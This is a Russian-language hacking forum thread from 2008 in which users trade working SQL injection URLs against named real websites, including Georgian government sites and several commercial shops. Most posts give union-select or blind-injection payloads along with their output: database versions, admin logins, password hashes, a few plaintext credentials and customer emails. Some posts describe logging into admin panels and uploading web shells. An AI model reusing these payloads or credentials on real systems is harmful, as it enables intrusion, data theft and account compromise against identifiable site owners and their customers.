SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    кодировка ппц )
     
  2. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    http://www.adjara.gov.ge/eng/index.php?page=show&id=-919+union+select+1,2,3,version()--
     
    1 person likes this.
  3. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    www.president.gov.ge


    http://www.president.gov.ge/index.php?l=G&m=0&sm=3&id=2693+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
    5.0.22-log
    president_gov_ge


    В таблице юзерс только один логин/пароль
    nino:fe3af9dcad7c5f65ae0e8a19ba6cb1f0(ni654)

    Админка: http://www.president.gov.ge/admin.php, но ацес дейнед-видимо лок по ип :(
    kolkhida.ge
    http://www.kolkhida.ge/rus/view_gancx.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9/*
    4.1.20
    test


    www.museum.ge
    http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9
    4.1.22-standard-log
    museumg_zaza
     
    #6203 $p01nt, 10 Aug 2008
    Last edited: 10 Aug 2008
    3 people like this.
  4. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.norma.com.ua/main_description.php?newsletters_id=1'+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(customers_email_address,0x3a3a,customers_password)+FROM+customers+limit+32,1)),0x71),0x71),4,5,6/*

    Походу опять многократный хеш....
     
  5. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
    Помогите плиз незнаю что дальше делать :( я просто только начинаю все осваивать и несовсем получается.
     
    #6205 S0ulVortex, 10 Aug 2008
    Last edited: 10 Aug 2008
  6. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    S0ulVortex вопросы по уязвимостям не сюда,дальше либо брут(если четвертая),либо вывод таблиц (если пятая) на сайте есть отличный фак! Читай!
     
  7. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134


    вот, просмотрел немного бд.
    Version: 5.0.45-log
    User: [email protected]
    Database name: u13238
    Database name: u13238_2
    Database name: u13238_3

    и кончилось терпение))

     
    1 person likes this.
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://koshhejjka.sirenes.ru/index.php?d=22&p=-1+union+select+concat(name,0x3a3a,e_mail,0x3a3a,pass),2,3,4+from+tbl_artist+limit+1,10/*

    Косяковые гловы....
    login: [email protected]
    pass: jxtymcnhfiyjtrbyj
     
  9. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    http://perekrestok.ca/

    http://perekrestok.ca/?page=countries&country_id=-1+union+select+1,2,unhex(hex(concat(login,0x3,password,0x3,email,0x3,icq))),4,5,6,7+from+users+limit+0,0--

    4.1.20inetlaba_perek@localhostinetlaba_perek

    Adminvan1238[email protected]111
    Superadminvfhbzuelbyf[email protected]
    gendolfvfhbzuelbyf[email protected]
     
  10. -=Static=-

    -=Static=- Banned

    Joined:
    12 Nov 2006
    Messages:
    201
    Likes Received:
    40
    Reputations:
    0

    На этой же базе висит сайт:
    http://vozmi.ru
    ТИЦ: 130
    PR: 4

    Code:
    http://vozmi.ru/furniture/catalog.php?catalog=-97+union+select+user(),2,3/*
     
  11. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    http://www.results.cec.gov.ge/ubnebi.php?district=22+and+1=@@version--

    Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
  12. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    *******************
    *******************
    Version:5.0.45-log3
    user:[email protected]
    ничего интересного - сайт носит информационный характер
    ---------------------------------------------------------------------
    *
    User:root@localhost
    Version:5
    Есть таблица db,копия mysql.user
    root:*2F69143FB5C4B18522CA1EC561E137AB9D3F9170
    Не могу залить шелл,расскажете если кто-то зальет)
    а то я и так делал:
    и в HEX фигачил,все равно не помогло =(
     
    #6212 DDoSька, 10 Aug 2008
    Last edited: 10 Aug 2008
    1 person likes this.
  13. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    http://www.fergusonhill.co.uk/

     
    #6213 Zircool, 10 Aug 2008
    Last edited: 11 Aug 2008
    1 person likes this.
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Ахтунг! =)

    http://www.stayer.su/index.php?res=collection&cmd=view&id=-1+union+select+concat(login,0x3a3a,password,0x3a3a,name,0x3a3a3a3a)+from+users+limit+0,1/*

    Сначала пытался потыкать админовскими реквизитами в формочку авторизации на главной страничке сего чудного сайта. Не получилось. Хитрый администратор спрятал мою админку в http://www.stayer.su/adm

    Логинимся. Заливаем шел.

    Юзаем: тут был шел ...
     
    #6214 Cennarios, 11 Aug 2008
    Last edited: 11 Aug 2008
    3 people like this.
  15. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://bdigital.biz/index.php?pageid=214+AND+ascii(lower(substring(version(),1,1)))=51

    version=3.*.*.*
     
    1 person likes this.
  16. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    http://www.avtobamper.ru/item_view.php?id=49&item_id=-1+union+select+1,2,3,Version(),5,user(),7,database(),9,10,11,12,13/*
    Можно чёнють седлать? Пытался нече неполучилось :(
    Вот ещё немагу найти админку, все нашол а админку нет :)
    http://www.good-food.ru/
     
    #6216 S0ulVortex, 11 Aug 2008
    Last edited: 11 Aug 2008
  17. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12--
    hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log

    http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1--
    выдает:
    Code:
    SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables'
    
    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86
    :(
     
  18. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

    http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(version(),1,1)))=52--
    version() = 4.*.*.*

    edited:
    http://www.amanda-nylons.com/index.php?pageID='
    странно как-то -) order+by говорит что 1 колонка, а union+select+1 никак вообще. мож кто разберется.
     
    #6218 Calcutta, 11 Aug 2008
    Last edited: 11 Aug 2008
  19. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    http://biomac.ru/index.php?pageid=-117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
     
  20. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Сайт: www.blackratpress.co.uk PR=5

    Админка:

    Логин и пароль админа:
    Пытался залить шелл, ничего не получлось, у кого получится отпостите...
     
    1 person likes this.
Thread Status:
Not open for further replies.